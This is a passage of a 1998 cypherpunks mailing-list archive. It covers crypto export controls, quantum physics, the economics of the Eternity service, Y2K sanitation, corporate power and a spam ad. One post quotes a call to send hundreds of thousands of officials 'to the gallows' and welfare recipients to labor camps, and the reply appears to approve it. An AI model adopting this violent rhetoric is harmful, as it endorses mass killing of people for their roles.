Geodesic, recursive software auctions with digital bearer-settled cash will
eventually make all of this, including intellectual property issues, moot
someday :-), but, in the meantime, simply obeying the laws on crypto export
will work marvellously. Even in a post- "Adult Action" world, where all
laws are enforceable everywhere, obeying them all, will, paradoxically,
work just fine, as we'll see in a bit.


Of course, all this makes the crypto *import*/arbitrage market, where C2NET
made their first million, a mostly diminishing one, whether Wassenaar works
or not. Certainly it's not a large enough market to renounce your citizenship
for, as one member of their firm has done. This whole export-control tactic
will eventually fail, and when crypto is unregulated, either by the market
or by law itself, some crypto-fugitives will still be locked out of the
largest economies in the world, especially if, however temporary the tactic
and doomed to failure it is, nation-states actually criminalize
crypto-arbitrage itself.


Again, it's not laws, it's technology, which is the solution to this silly,
and fairly theocratic, dispute about criminalizing the export of cryptography.

Remember the e$yllogism: Strong cryptography is essential to digital commerce.
In fact, strong financial cryptography is utterly necessary *and* sufficient
for digital commerce. Thus, no strong cryptography, no digital commerce.

Since all commerce will have a digital, and thus cryptographic, component
soon enough, cryptographic regulation is, like Carl Ellison's analogy of
church doctrine forbidding peasants from shooting nobility, fairly useless.
Especially since nation-states can't help but allow the use of strong
cryptography to facilitate commerce, in the same way that they can't help
but allow the use of steel in their railroads.


So, I say unto all ye crypto-peasants out there, obey the Doctrine of
Crypto-Prohibition, on pain of the loss of your immortal soul. That is,
make and use the strongest cryptography that your microprocessors can
handle, and, like the peasant who, in confession, admits the shooting of a
knight, obey dogma and don't export cryptography: it will "export" itself,
like all good ideas do.

Cryptography, like the technology of gunpowder -- or better, steel -- is not
optional.


Cheers,
Robert Hettinga



- --- begin forwarded text


MIME-Version: 1.0
Date: Sat, 5 Dec 1998 18:47:25 -0500 (EST)
From: nelson@media.mit.edu (Nelson Minar)
To: Raph Levien <raph@acm.org>
Cc: cryptography@c2.net
Subject: Re: Wassenaar vs. CipherSaber
Sender: owner-cryptography@c2.net

>I'm spending more and more of my time these days in the free software
>community (not all that big a leap for a cypherpunk). I'm seeing the
>"crypto integration" problem all over the place.

This is an issue of serious concern; it's really holding up the
adoption of encryption, particularly at the TCP/IP level.

An interesting model for how to get around the US regulations is what
Sun is doing with Java. Java 1.2 ships with pretty much everything you
need for strong, composable cryptography - big numbers, a key
management framework, digital signatures.

But they're following the letter of the US export regulations. Sun has
defined the Java Cryptographic Extensions, a decent API for doing
encryption. Bcause they are a US company they only ship a JCE
implementation to people in the US. But they've made it about as easy
as possible for folks outside the US to implement their own drop-in
replacements.

One interesting choice they've made is that, as near as I can tell,
they aren't even bothering to ship a 40/56 bit crippled version. If
you want crypto at all, you have to use Sun's JCE or get a non-US
alternative. So you can only get real crypto, not some useless junk.

I think that's probably the right idea - don't cave in to the US
regulations, just follow them the minimum you have to and make sure
it's easy for people outside the US to reimplement the parts you are
not allowed to ship.

I guess we have to wait and see how much Wassenaar complicates things.

                                                  nelson@media.mit.edu
.       .      .     .    .   .  . . http://www.media.mit.edu/~nelson/

- --- end forwarded text

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNmqVrcUCGwxmWcHhAQE0zwgAqVUrB7Vu1NVqNHaGHeRTHUB9Z2li7x/m
5eMYUdKu8I3696LCC9CApwHi2vGW39jh0/dUR26+utNQ6MaJEyCrpjA7WpSvaqBQ
XGrEPjEN58KQAlGydmjpxxL4ukX606dTKndiTPz5ujRGo1EtshRkB+2NmnUZOYZN
+ECDrOylPFkDLDMqLGwqzY9zU79xZMvyIVQvpT2onUzfx3LgyjjC2/ZQbvJmOSsD
vk14KbsyL6UEwyaH8FqUZWG/qGgQSALJsLpregApq0QHWl15+rEd+TvqWnyPvDKL
cIIz3Cyo0QlwYFQWhg6JiPWRB+GQxaDaMS7QQqZeBqUSJclnVdJH+w==
=gpAa
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Griffiths <griffith@wis.weizmann.ac.il>
Date: Sun, 6 Dec 1998 22:31:05 +0800
To: Eric Cordian <cypherpunks@cyberpass.net
Subject: Re: Aharonov-Bohm Effect
In-Reply-To: <199812051815.MAA28244@wire.insync.net>
Message-ID: <366A8C61.2B14E950@wis.weizmann.ac.il>
MIME-Version: 1.0
Content-Type: text/plain



Eric Cordian wrote:
> 
> Could someone (other than Jim Choate) explain the mechanism behind the
> Aharonov-Bohm effect, where a quantum field propagating via two
> distinct paths finds its wavefunction phase shifted by the amount of magnetic
> flux enclosed, even if it is completely shielded from the magnetic field,
> and traverses only regions of space where B=0.

What do you actually want explaining? Although the magnetic field is
zero along the paths traveled (so that electrons never feel the magnetic
field and the Lorentz force that affects a moving charge in one), the
vector
potential field is not, and is different for the two paths. This causes
the
AB-effect. See, for example G.Baym, 'Lectures on Quantum Mechanics'
(Benjamin, NY, 1969) page 77-79.

> This has apparently been experimentally verified,

Yup, one of the best being N.Osakabe et al, Physics Review A, v34, page
815,
(1986).

> and is a leading candidate for reading the state of quantum dots.

I think you have that the wrong way round - the state of Q. dots is
easy to measure, and so if you put a QD in one arm of an Aharonov-Bohm
interferometer, then measuring the state of the dot allows you know
which path an electron took. If you know that, the wavefunction of
the electron collapses to include just one path, so there is no
interference.
Eyal Buks et al demonstrated this last year - as they increased the
sensitivity of the probe to measure the occupancy of the quantum dot,
the Aharonov-Bohm oscillations in what was classical a separate
system died away.

If you want more details, I'll be happy to explain more. Maybe we should
take it off-list, though, as I seem to have accidently included
references and an informed opinion in my reply, rather than a bigoted
rant.

As for relevance, it is left as an exercise for the reader to work out
why it might be useful to in principle measure fluctuations in a
magnetic
field which is heavily screened, and it's application to cryptography
and
privacy.


Tim

--
Tim Griffiths                   griffith@wis.weizmann.ac.il
Center for Submicron Research   http://tim01.ex.ac.uk
Weizmann Institute of Science   (972)-8-934-2736
Rehovot 76100 Israel

 'I have sat and listened to the arguments of men,
  and I tell you they are shallow movements in space
  tied to reality only by the ego of their minds.' -DF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 7 Dec 1998 00:17:15 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (eternity) cost metrics (fwd)
Message-ID: <199812061547.JAA00980@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 6 Dec 1998 00:26:19 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: Re: (eternity) cost metrics

> Jim Choate writes:
> > Adam Back <aba@dcs.ex.ac.uk> wrote:
> > > I think a better deciding factor of which files remain and which don't
> > > is hard, anonymous ecash.  [...]
> > 
> > There is some window for abuse in this method. It allows a well endowed
> > entity to bias the information available. 
> 
> The alternatives, such as say one vote per person have problems too.

I'll agree that any system that relies on charging the originator of the
information, versus the user of the information, is flawed in this way.

Does your local grocery store charge the truck that delivers its tomato's?
Does a book publisher ask that the potential author pay for the book run and
advertising? Does the newspaper charge their reporters to put their articles
in the paper?

> Cash allows you to measure the scale.

No, it allows a mechanism in the short-term for the Eternity market to be
manipulated by parties with a political interest and large buckets of cash.

> So straight cash seems I think to be a good metric.

The point of the cash is to provide a motivation to keep Eternity up, NOT a
measure of the worth of any specfic piece of information from the
perspective of the server operator, it's the users of that data that define
it's worth. That worth can and probably will have many facets that can't be
reflected in simple dollars and by definition outside the keen of the
Eternity networks current worth estimation model.

In the majority of cases the Eternity operator won't have a clue as to the
actual market worth of some data.

There is also the issue of information worth collapse once the data is
available off the Eternity network that hasn't been touched. This works to
the negative of the Eternity networks long-term goal.

For example, let's say a whistle-blower comes in with some juicy info. The
Eternity server network, through some mechanism that I've never seen
sufficiently described, determine that the originator must pay some amount
of money to post it. The data gets posted and users grab it over the next
few days. Then once it's available in the alternate channels (eg printed on
a webpage of a newspaper) the future market potential for the Eternity
servers goes through the floor.

This motivates the Eternity network to over-value the worth of data which
further keeps folks out.

> Note also my earlier comment that I view an important eternity
> objective to be preventing negative votes on data availability.  You
> can only disseminate more, say contradictory, information not remove
> information.

Well, considering that Eternity doesn't do anything regarding archiving and
long-term storage there really isn't a worry here. All that's required is to
keep the price up until the window of relevance is gone. Then back out, the
price drops back to it's original cost but now that it's relevance is gone
it slowly (or not) fades away. Depending on the particular nature of the 

> You can attempt to disseminate more copies (make
> available with higher redundancy, and fund faster download) perhaps,
> but this does not drown out the other information.

Actualy this is a complete change of track and irrelevant.

The POINT is that if there is a piece of information that I want to keep out
of the hands of others I simply go to server after server and ask for a
copy. This activity raises the price. Since I've got lots of cash and I want
that document to be expensive I continue to buy copies further inflating the
price.

> If you worry that mega-corp M will buy all available space at a
> premium, there is an easy solution:

Straw man, if the Eternity servers have a clue as M Corp. buys more space
the server operators buy more drives to sell since their now in the data
space business and not the information brokering business. Hence M Corp. has
distracted the Eternity services from their primary operations.

So a workable strategy for M Corp. would be to inflate the price on the data
they want to hide as well as continue to dump monies into the Eternity
network buying space. Then at some point they abruptly stop their support
and the Eternity services collapse because they've now grown to such an
extent they can't survive without this artificial market manipulation. So
the Eternity servers go down, further obfuscating the original information
that M Corp wanted to hide.

The Eternity model also completely ignores the consequences of such a
manipulation in regards the re-building of a new service after the collapse.
The amount of trust that potential users have will be low further increasing
the difficulty of keeping the servers operating long-term.

Because the Eternity network relies only on the immediate short-term worth
of data it is brittle.

> > There is also the question of data degredation, in the sense of
> > worth, over time versus the archival/historical worth of the
> > data.
> 
> As long as people are interested to keep the data around in low
> priority low access speed storage they will pay for this to happen.
> 
> If they don't care -- well they don't care.  People who do care can
> fund it, and evangelize to others on the merits of doing this.  No one
> has any special right to force others to pay for keeping junk around
> for the sheer historical sake of completeness of it.

So, a primary ideal of the Eternity service is that as long as the data has
a worth below some level they'll drop it.

This is one of the reasons that a long-term service like this won't work. It
isn't reliable because I can't come back 50 or a 100 years from now to get a
piece of data unless there is sufficient interest by other parties to access
it as well.

This is short-sighted and limits the use of Eternity.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
 
                                                Howard Zinn


       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 7 Dec 1998 00:16:38 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (eternity) democracy is a bad idea on the net too! (fwd)
Message-ID: <199812061551.JAA01051@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 06 Dec 1998 01:07:38 -0800
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: (eternity) democracy is a bad idea on the net too! (fwd)

> At 02:47 PM 12/5/98 -0600, Jim Choate wrote, not in this order:
> > Two major negatives to a free-market approach that are never discussed.
> 
> >There is also the question of data degredation, in the sense of worth, 
> >over time versus the archival/historical worth of the data.
> 
> Huh?  We talk about this all the time.  How much does data storage cost,
> and how long is the information useful to readers and writers,

And you drop it at that point. No, you do not adequately discuss the
ramification of the economic nor of the social and historic motives to drive
the long-term archiving of all data in the network.

The current Eternity model is brittle in several ways. The problem is the
current economic model that all its supporters are wedded to. If that model
changes and takes on the range of responsibilities (some of them outside a
simple profit/cost approach) that such a service should carry it would work.

I made reference to a couple of these in my responce to Adam so I won't
reitterate them here.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
 
                                                Howard Zinn


       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 7 Dec 1998 00:13:53 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: China executes pager smugglers [CNN]
Message-ID: <199812061557.JAA01136@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cnn.com/WORLD/asiapcf/9812/06/china.execution.ap/

>               CHINA EXECUTES TWO FOR SMUGGLING COMPUTERS, PAGERS
>                                        
>    December 6, 1998
>    Web posted at: 6:17 a.m. EDT (0617 GMT)
>    
>    BEIJING, China (AP) -- In the midst of a sweeping crackdown on illegal
>    imports, China said Sunday that it has executed a computer executive
>    and an office worker for smuggling computers, pagers and other
>    electronic goods into the country.
>    
>    The deaths come as China carries out a campaign to enforce trade
>    barriers that shield its industries from foreign competition in an
>    attempt to quash a multibillion-dollar market for illegally imported
>    products.

[text deleted]


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
 
                                                Howard Zinn


       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Mon, 7 Dec 1998 01:35:41 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Aharonov-Bohm Effect
In-Reply-To: <366A8C61.2B14E950@wis.weizmann.ac.il>
Message-ID: <199812061706.LAA29544@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim Griffiths <griffith@wis.weizmann.ac.il> writes:
 
> What do you actually want explaining? Although the magnetic field is
> zero along the paths traveled (so that electrons never feel the
> magnetic field and the Lorentz force that affects a moving charge in
> one), the vector potential field is not, and is different for the two
> paths. This causes the AB-effect. See, for example G.Baym, 'Lectures
> on Quantum Mechanics' (Benjamin, NY, 1969) page 77-79.
 
Why do I find this odd?  Because the electromagnetic field acts
locally, the vector potential is not directly observable and depends
on ones choice of gauge, and wavefunction phase is also not directly
observable.  The integral of the vector potential around the closed
path is of course well-defined, but this is global, not local.
 
So it seems strange, and hints at some sort of "action at a distance"
thing occuring.  The wavefunction is being perturbed according to the
magnetic flux enclosed by a path, even while propagating in a region
distant to the flux which contains no electromagnetic field at all.
 
> As for relevance, it is left as an exercise for the reader to work out
> why it might be useful to in principle measure fluctuations in a
> magnetic field which is heavily screened, and it's application to
> cryptography and privacy.
 
It still seems counterintuitive to suggest that I can make a tour
around a magnetic field an arbitrary distance away, and get a precise
reading of its strength.  Would it work a mile away?  A light year
away?  Does this result follow from QED?  Some equations might be
helpful.

--  
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Mon, 7 Dec 1998 04:11:28 +0800
To: "'Tim May'" <cypherpunks@cyberpass.net>
Subject: RE: Vengeance Libertarianism
In-Reply-To: <v0313032db28dd1b178bb@[209.66.100.75]>
Message-ID: <000001be214f$b78da940$688195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Tim May:

: "You've stolen my property, you've imprisoned my friends, you've passed
: laws making us all criminals, you've started wars to enrich your
: military-industrial complex friends, and you're corrupt bastards. You can
: forget about some kind of "libertarian amnesty." It's going to be payback
: time, with at least hundreds of thousands of statist judges, politicians,
: cops, soldiers, and other such persons going to the gallows.
: Payback time.  Welfare recipients are going to have to pay back all that
: they have stolen, with compounded interest. Out of their pockets, or while in
: labor camps.  Payback time."
.................................................



	When.


   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Diana <sales@webhosting.dddcom.com>
Date: Mon, 7 Dec 1998 01:20:42 +0800
To: <cypherpunks@Algebra.COM>
Subject: Business Web Hosting @ $12.95 + E-Commerce With Free Web Hosting  Advertisement
Message-ID: <419.436134.87339352sales@webhosting.dddcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Our research indicates that you might be interested in our offer. Please pardon us if 
we are in error and hit reply with "remove" in subject line. Thank you for your time.

OFFER 1
You can now have your own 50MB web site (www.yourname,com) for just $12.95 
per month ! Our limited time offer includes Free setup + 50MB space + Unlimited 
email accounts + Unlimted hits + 100% FrontPage98 compatibility + Unix/N T 
Server/Netscape + Many other features !!
Free tranfer of your existing domain + Excellent Reseller plans
Why pay more...we give you the fastest servers (1074MB/SEC)
All the features that your business wants...for just $12.95 per month.

OFFER 2

ACCEPT CREDIT CARDS & CHECKS ON LINE WITH FREE WEB HOSTING !

Free setup for a limited time. 98% approved and you can be in business for the 
busy Christmas season ! You can now have a complete E-Commerce solution and 
start accepting credit cards and checks on line. Research shows that accepting 
credit cards over the net increases business potential by over 300%. Our solution is 
complete with merchant accounts, shopping cart, gateway for transactions and 
includes FREE 50MB Premium Web Hosting !

For info email to sales@webhosting.dddcom.com
Visit our site at www.webhosting.dddcom.com

Web Hosting & Merchant Accts
240 Union Ave 
Campbell CA 95008
408-378-9996






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Fiero <rfiero@pophost.com>
Date: Mon, 7 Dec 1998 04:41:09 +0800
To: cypherpunks@cyberpass.net
Subject: Palm III proves a hi-tech helper for car thieves
Message-ID: <199812062006.NAA24550@pophost.com>
MIME-Version: 1.0
Content-Type: text/plain



Taken from
http://www.theregister.co.uk/981204-000007.html

A 3Com Palm III and software that lets the handheld control TVs and VCRs
through its infrared port are all you need to nick a car these days, it seems.

Danish IT journalist Lars Sorensen made the discovery when testing the
sofwtare's legitimate uses. The software samples a TV's remote control
signals so it can replicate them -- Sorensen wondered if it would do the
same with a car's infrared lock and found that it would.

Here in the UK, estimates from the Motor Insurance Repair Research Centre,
quoted in New Scientist magazine, suggest that three million of the 22
million cars on the road are vulnerable to Palm-toting thieves.

Interestingly, older cars that are more at risk than newer models. Most
modern vehicles contain locking systems that change the locking code every
time the key is used from sequences of 10 to the power 64 (a one with 64
zeros after it) making it virtually impossible to predict the code at any
given instance.

That said, Sorensen was able to enter a 1998 model, so no one can be sure
they are safe.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Mon, 7 Dec 1998 05:28:26 +0800
To: mah248@nyu.edu (Michael Hohensee)
Subject: No food, no shit (Re: y2k/gary north delusionsn)
In-Reply-To: <366A2610.7F850BA3@nyu.edu>
Message-ID: <199812062043.OAA12057@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Michael Hohensee wrote:
> 
> 
> Igor Chudov @ home wrote:
> > 
> > Michael Hohensee wrote:
> > > Latrines aren't sufficient to the task.  In a city like NYC, latrines
> > > might solve the problem for perhaps a week (assuming that we tear up all
> > > the roads and sidewalks --something which we cannot do in time, even if
> > > we wanted to), but then they'll be full, and there won't be any more
> > > places the latrines can be rotated to.
> > 
> > Why, shit is actually pretty compact. usually with latrines, the liquid
> > filtrates out, and the compressed shit does not take too much space.
> > 
> > If you dig a deep enough hole (2-3 yards) it should last for a long,
> > long time. I estimate that a human being produces about 1/2 to 1lb
> > of hard waste per day, some are more full of it, some less. Let's settle
> > on one lb per day.
> > 
> > Let's see, a hole that is 5 yards wide, 3 yards deep, and, say, 2 yards
> > wide, is about 30 cubic yards. It could take about 40 tons of hard
> > compressed waste, that is, 80 thousand man-days of shitting can be
> > compressed in it.
> > 
> > You definitely need some heavy machinery to dig this kind of hole
> > (and then you have to build smoe kind of frame over it to prevent people
> > from falling into it if it collapses), but it is not hard and can even
> > be done in a catastrophic scenario.
> > 
> > That's a lot!!! Let's see,a high rise building with 50 floors and 10
> > apartments in each floor, that's about 1200 people. The latrine would
> > last them what, about sixty days! And then they can dig another one.
> 
> This assumes that we can compress it this much, which assumes that we
> have sufficient machinery.  It further assumes that we will be able to
> ignore the "wet" component of human waste.  You can't just pour it down
> the drains.

No, the wet component filtrates out of the hole, into the soil.

Compression happens automaitcally.

> Next, we should realize that these latrines are themselves not going to
> be particularly sanitary, and it would be most unwise to use them for
> any extended period of time.  Hell, even *with* flush toilets, I've seen
> people squatting down in subway stations to take a leak not more than 5
> feet from the restroom.

Yeah, they are not too sanitary, but it is livable.

I refer you to the book "Where there is no doctor" that talks
about it. (a great book, all in all)

> Further, we should realize that for the above reason, people are not
> going to be particularly motivated to use these latrines.  After all,
> nobody wants to hold it for a long time while they wait in line to take
> a leak, just for the privilege of relieving themselves in disease
> central.  You're going to see shit in the street in any case.

I suspect that this will not be happening a lot in the cleaner
parts of the city.

> Finally, even if we dig these holes, (and they're *going* to be bigger
> than what you describe, as they must contain liquid, as well as solid

liquid disspiates.

> waste), we're going to end up messing up the roads something fierce. 
> Big cities *need* roads to transport life-critical items.  If we dig
> them up, we're in even worse trouble.
> 
> > > Then we're back to doing it in the open.  Less concentrated cities might
> > > last a while longer, but not much longer.  There's no getting around it,
> > > we *need* working sewer systems to have modern cities.  Otherwise, the
> > > cities die.
> > 
> > Not in the short run. They could survive for a while.
> > 
> >         - Igor.
> 
> In the *very* short run.  Like, say, a few weeks.  That is if the food
> doesn't stop coming in first --then things finish up a bit sooner.

Well, if you have no food, you make no shit.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Mon, 7 Dec 1998 05:20:43 +0800
To: mah248@nyu.edu (Michael Hohensee)
Subject: Re: y2k/gary north delusions
In-Reply-To: <366A26C2.30D6892E@nyu.edu>
Message-ID: <199812062044.OAA12076@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Michael Hohensee wrote:
> 
> 
> William H. Geiger III wrote:
> > 
> > In <36694C23.B4CB9509@nyu.edu>, on 12/05/98
> >    at 10:07 AM, Michael Hohensee <mah248@nyu.edu> said:
> > 
> > >Then we're back to doing it in the open.  Less concentrated cities might
> > >last a while longer, but not much longer.  There's no getting around it,
> > >we *need* working sewer systems to have modern cities.  Otherwise, the
> > >cities die.
> > 
> > And you say this as if it is a bad thing.
> > 
> 
> Well it is, sorta.  I've got the misfortune to live in NYC, as do many
> many many other people.  People who (like me) aren't particularly
> interested in dying of disease and/or starvation.  If the "shit hits the
> fan", we're in for a serious mess, in any event. :/

Well, you've made a conscious choice, being fully aware of ramifications.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Mon, 7 Dec 1998 05:40:21 +0800
To: Michael Hohensee <mah248@nyu.edu>
Subject: Re: y2k/gary north delusions
In-Reply-To: <366A26C2.30D6892E@nyu.edu>
Message-ID: <199812062023.PAA001.79@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <366A26C2.30D6892E@nyu.edu>, on 12/06/98 
   at 01:40 AM, Michael Hohensee <mah248@nyu.edu> said:

>William H. Geiger III wrote:
>> 
>> In <36694C23.B4CB9509@nyu.edu>, on 12/05/98
>>    at 10:07 AM, Michael Hohensee <mah248@nyu.edu> said:
>> 
>> >Then we're back to doing it in the open.  Less concentrated cities might
>> >last a while longer, but not much longer.  There's no getting around it,
>> >we *need* working sewer systems to have modern cities.  Otherwise, the
>> >cities die.
>> 
>> And you say this as if it is a bad thing.
>> 

>Well it is, sorta.  I've got the misfortune to live in NYC, as do many
>many many other people.  People who (like me) aren't particularly
>interested in dying of disease and/or starvation.  If the "shit hits the
>fan", we're in for a serious mess, in any event. :/

It is your choice to live in the cesspool know as NYC. I am originally
from Chicago, I got the hell out of there the 1st chance I got and have
never looked back.

Large metropolitan complexes are obsolete and their problems greatly
outweigh their benefits. I am a land owner and *like* owning land, I enjoy
having grass and trees, streams to fish and swim in, not living in a cage
with my neighbors on the other side of a paper thin wall. I have enough
land that I could plow it up and do subsistence farming to survive if the
collapse ever comes (subsidized with fishing and hunting).

Why anyone would want to live like a rat is beyond me.

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 7 Dec 1998 08:29:49 +0800
To: cypherpunks@cyberpass.net
Subject: tyranny of corporations
Message-ID: <199812062342.PAA05825@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message
Date: Sun, 06 Dec 1998 16:11:08 -0700
From: Robert Weissman <rob@essential.org>
To: Multiple recipients of list CORP-FOCUS <corp-focus@essential.org>
Subject: corporation nation

Exxon merges with Mobil. Citicorp marries Travelers. Daimler Benz gobbles
up Chrysler. BankAmerica takes over NationsBank. WorldCom eats MCI.

Corporations are getting bigger and bigger, and their influence over our
lives continues to grow. America is in an era of corporate ascendancy, the
likes of which we haven't seen since the Gilded Age.

Charles Derber, a professor of sociology at Boston College, believes that,
contrary to the lessons our civics teacher taught us, it is undemocratic
corporations, not governments, that are dominating and controlling
society.

In his most recent book, Corporation Nation (St. Martin's Press, 1998),
Derber argues that the consequence of the growing power of giant corporate
multinationals is increased disparity in wealth, rampant downsizing and
million dollar CEOs making billion dollar decisions with little regard for
average American.

A couple of years ago, Derber wrote The Wilding of America (St. Martin's
Press, 1996) in which he argued that the American Dream had transmuted
into a semi-criminal, semi-violent virus that is afflicting large parts of
the elites of the country.

That book tried to call attention to the extent to which violent behavior
could be understood as a product of oversocialization.

"The problem was not that they had been underexposed to American values,
but that they could not buffer themselves from those values," Derber told
us. "They had lost the ability to constrain any kind of anti-social
behavior -- because of obsessions with success -- the American Dream."

By anti-social behavior, Derber means the epitome of Reaganism -- "a kind
of warping of the more healthy forms of individualism in our culture into
a hyperindividualism in which people asserted their own interests without
regard to its impact on others."

At the time, Derber was interviewed on a Geraldo show about paid assassins
- - -- people who killed for money.

"It was scary to be around young people who confessed to killing for
relatively small amounts of money -- a few thousand dollars," Derber said.
"They said things like -- 'you have to understand, this is just a
business, everybody has to make money.' I pointed out on the show that
this was the language that business usually uses."

At the same time, Newsweek ran a cover story titled "Corporate Killers."
On the cover, Newsweek ran the mug shots of four CEOs who had downsized in
profitable periods and upped their own salaries.

"These corporate executives tended to use the same language as the paid
assassins on the Geraldo show, 'I feel fine about this because I'm just
doing what the market requires,'" Derber explains. "I develop an analogy
between paid assassins on the street and those in the suites. In the most
general sense, these corporate executives are paid hitmen who use very
much the same language and rationalization. I argue that corporations are
exemplifying a form of anti-social behavior which is undermining a great
deal of the social fabric and civilized values that we would hope to
sustain."

With the hitmen parallel fresh in his mind, Derber began writing
Corporation Nation. In it, Derber points to the parallels between today
and the age of the robber barons 100 years ago -- the wave of corporate
mergers, the widening gulf between rich and poor (Bill Gates' net worth
(well over $50 billion) is more than that of the bottom 100 million
Americans), the enormous influence of corporations over democratic
institutions, both major parties bought off by big business, and a
Democratic President closely aligned with big business (Grover Cleveland
then, Bill Clinton today).

One big difference between then and now: back then, a real grassroots
populist movement rose up to challenge corporate power, though it did not
succeed in attaining its core goals.

Today, while there are many isolated movements challenging individual
corporate crimes, there is no mass movement attacking the corporation as
the cause of the wealth disparity, destruction of the environment, and all
the many other corporate driven ills afflicting society.

Derber, a professor of sociology at Boston College, says that when he asks
his students, "Have you ever thought about the question of whether
corporations in general have too much power," they uniformly say they have
never had that question raised.

Derber says that one good way to again build a populist movement to attack
corporate power is to study the language and tactics of the populists of
100 years ago. He has, and he makes clear in his book that the original
conception of the corporation was one of a public -- not private --
entity.

We the people created the corporation to build roads, and bridges, and
deliver the goods. If the corporation didn't do as we said, we yanked
their charter.

The corporate lawyers quickly got their hands around that idea, smashed
it, and replaced it with the current conception of the corporation, a
private person under the law, with the rights and privileges of any other
living and breathing citizen.

Thus, a quick transformation from "we decide" to "they decide."

Derber is a bit too modest to say it, so we will: perhaps the best way to
rebuild a strong, vibrant and populist movement is to get this book into
the hands of people who care about democracy. The corporations have us on
the run, but we should pause for a moment or two, find a quiet place, and
read this book.

Russell Mokhiber is editor of the Washington, D.C.-based Corporate Crime
Reporter. Robert Weissman is editor of the Washington, D.C.-based
Multinational Monitor.

(c) Russell Mokhiber and Robert Weissman

Focus on the Corporation is a weekly column written by Russell Mokhiber
and Robert Weissman. Please feel free to forward the column to friends or
repost the column on other lists. If you would like to post the column on
a web site or publish it in print format, we ask that you first contact us
(russell@essential.org or rob@essential.org).

Focus on the Corporation is distributed to individuals on the listserve
corp-focus@essential.org. To subscribe to corp-focus, send an e-mail
message to listproc@essential.org with the following all in one line:

subscribe corp-focus <your name> (no period).

Focus on the Corporation columns are posted on the Multinational Monitor
web site <www.essential.org/monitor>.

Postings on corp-focus are limited to the columns. If you would like to
comment on the columns, send a message to russell@essential.org or
rob@essential.org.





- - ------=_NextPart_000_0027_01BE20F3.6E8982C0--


- - --------------81265CC28DD038A0DC2CB928--


- ------- End of Forwarded Message


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 7 Dec 1998 08:23:22 +0800
To: Adam Back <cypherpunks@cyberpass.net
